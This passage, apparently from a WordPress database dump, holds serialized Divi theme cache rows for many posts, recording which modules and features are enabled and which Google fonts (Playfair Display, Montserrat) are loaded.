teractions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34058,1394,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34059,1394,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34060,1394,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34061,1394,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34062,1040,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34063,1040,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34064,1040,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34065,1040,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34066,1595,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34067,1595,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34068,1595,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34054,1557,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34055,1557,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34056,1557,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34057,1557,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34053,1159,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34049,1086,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34050,1159,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34051,1159,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34052,1159,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34045,907,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34046,1086,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34047,1086,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34048,1086,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34039,1052,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34040,1052,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34041,1052,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34042,907,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34043,907,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34044,907,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34034,1253,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34035,1253,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34036,1253,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34037,1253,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34038,1052,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34033,858,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34029,1309,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34030,858,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34031,858,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34032,858,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34025,922,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34026,1309,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34027,1309,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34028,1309,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34021,844,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34022,922,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34023,922,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34024,922,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34013,760,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34014,1296,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34015,1296,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34016,1296,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i